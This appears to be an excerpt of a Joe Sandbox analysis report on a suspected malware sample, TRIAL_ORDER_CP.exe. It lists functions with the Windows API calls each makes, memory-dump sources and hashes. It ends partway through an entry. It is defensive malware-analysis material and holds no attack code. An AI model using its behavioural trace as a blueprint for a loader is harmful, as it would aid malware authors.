                                          Function 70681774 Relevance: 3.8, APIs: 3, Instructions: 53COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 70681BFF: GlobalFree.KERNEL32(?), ref: 70681E74
                                            • Part of subcall function 70681BFF: GlobalFree.KERNEL32(?), ref: 70681E79
                                            • Part of subcall function 70681BFF: GlobalFree.KERNEL32(?), ref: 70681E7E
                                          • CloseHandle.KERNELBASE(00000000), ref: 706817DC
                                            • Part of subcall function 70681312: GlobalAlloc.KERNEL32(00000040,?,?,706815FE,?), ref: 70681328
                                            • Part of subcall function 70681312: lstrcpynW.KERNEL32(00000004,?,?,706815FE,?), ref: 7068133E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$Free$AllocCloseHandlelstrcpyn
                                          • String ID:
                                          • API String ID: 363591596-0
                                          • Opcode ID: efbe13558de39e405aff14f8e785af987c800f2050654c51a200aebdd3321317
                                          • Instruction ID: 959aa26c9ba416cf11ab9efc6aab1f62e63258d48171042429b97174f1200824
                                          • Opcode Fuzzy Hash: efbe13558de39e405aff14f8e785af987c800f2050654c51a200aebdd3321317
                                          • Instruction Fuzzy Hash: BE01A1F3404340AFC3519B75D82ABCE37ECAF40314F240919F5959E3C4EB74A8808BAA
                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 948 401389-40138e 949 4013fa-4013fc 948->949 950 401390-4013a0 949->950 951 4013fe 949->951 950->951 953 4013a2-4013ad call 401434 950->953 952 401400-401401 951->952 956 401404-401409 953->956 957 4013af-4013b7 call 40136d 953->957 956->952 960 4013b9-4013bb 957->960 961 4013bd-4013c2 957->961 962 4013c4-4013c9 960->962 961->962 962->949 963 4013cb-4013f4 MulDiv SendMessageW 962->963 963->949
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                          • Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
                                          • Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                          • Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D
                                          Function 00405AA8 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AEA
                                          • GetLastError.KERNEL32 ref: 00405AF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                          • Instruction ID: 13352011552d0ddc4b0c1568d720dcd5f2ba617a9a750a7f60e40e4c0ab4bb23
                                          • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                          • Instruction Fuzzy Hash: 52F0F4B0D0060EDADB00CFA4C6487EFBBB4AB04309F10812AD941B6281D7B882488FA9
                                          Function 00405B37 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                          • CloseHandle.KERNEL32(?), ref: 00405B6D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3712363035-0
                                          • Opcode ID: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                          • Instruction ID: e42c3092a0fd4a031c4fd4b3b8927d6f3122727aa63034fdce6a98e2e8d9435a
                                          • Opcode Fuzzy Hash: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                          • Instruction Fuzzy Hash: ECE09AB4900249BFEB109F64AD05E7B776CE745644F008525BD10F6151D775A8148A79
                                          Function 00406948 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C), ref: 0040695A
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406975
                                            • Part of subcall function 004068D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                            • Part of subcall function 004068D8: wsprintfW.USER32 ref: 0040692A
                                            • Part of subcall function 004068D8: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                          • String ID:
                                          • API String ID: 2547128583-0
                                          • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                          • Instruction ID: 551f93d59f6a57a7cc32b559d7ebc8a6d8da67cd5dc02587d5b4d2bd1ffdf244
                                          • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                          • Instruction Fuzzy Hash: 95E08673504310AAD2105A705E04C2B73B89F85740302443EF942F2140D734DC32E769
                                          Function 00406044 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,80000000,00000003), ref: 00406048
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                          • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                          • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                          • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                          Function 00405B02 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405B16
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                          • Instruction ID: 7bb2d1eb449126eed485e4eb4fbdbafbf981390ed288ef949080c13de55397a1
                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                          • Instruction Fuzzy Hash: 7CC08C30314902DADA802B209F0870B3A60AB80340F154439A582E00E4CA30A445C92D
                                          Function 70682B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileA.KERNELBASE(00000000), ref: 70682C57
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: e603e0ad443e8a7163f5da705e1a2e29d83e6ca47d138ef42cf4fc0fc48c8a27
                                          • Instruction ID: e37beeb617979f6845ca62c39ed5e7d50ab066ac5c19d5842683936109436a8b
                                          • Opcode Fuzzy Hash: e603e0ad443e8a7163f5da705e1a2e29d83e6ca47d138ef42cf4fc0fc48c8a27
                                          • Instruction Fuzzy Hash: D841A572500206EFDB259F65DD7AB9D3B76FF44318F308426E805D61E4D638A880DB95
                                          Function 004060C7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,004034E4,?,?,0040332B,?,00000004,00000000,00000000,00000000), ref: 004060DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                          • Instruction ID: 1a6ac9c2f17c3bf7024e7b579d6ce6ab3b84958f313ea5b4b1ce89539a84cc3a
                                          • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                          • Instruction Fuzzy Hash: 55E0EC3225026AABDF10DE55DC00EEB7BACEB053A0F018437F956E7150DA31E93197A8
                                          Function 004060F6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,0040349A,?,00793700,?,00793700,?,?,00000004,00000000), ref: 0040610A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                          • Instruction ID: 280cd4c212b49affc14266408846aa3a30e7e9a640caac8a44b81d30c287abca
                                          • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                          • Instruction Fuzzy Hash: E1E08C3221025AABCF109E908C01EEB7B6CEB043A0F014433FD16EB051D230E8319BA8
                                          Function 70682A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualProtect.KERNELBASE(7068505C,00000004,00000040,7068504C), ref: 70682A9D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 4dbe51419831dbae71d01fb9c501e67474cd2b29947a61e474d1c00567023170
                                          • Instruction ID: 72f67b6a44391393fe7e3fa381fbdd2028a3ddfbde21cdff6ef66d3f41be2940
                                          • Opcode Fuzzy Hash: 4dbe51419831dbae71d01fb9c501e67474cd2b29947a61e474d1c00567023170
                                          • Instruction Fuzzy Hash: 26F0C9B2500380FEC360CF3A8C7C7093FE0B718304B35452AE288EA2E8E3744444DB92
                                          Function 004063C1 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040644F,?,?,?,?,Call,?,00000000), ref: 004063E5
                                          Memory Dump Source
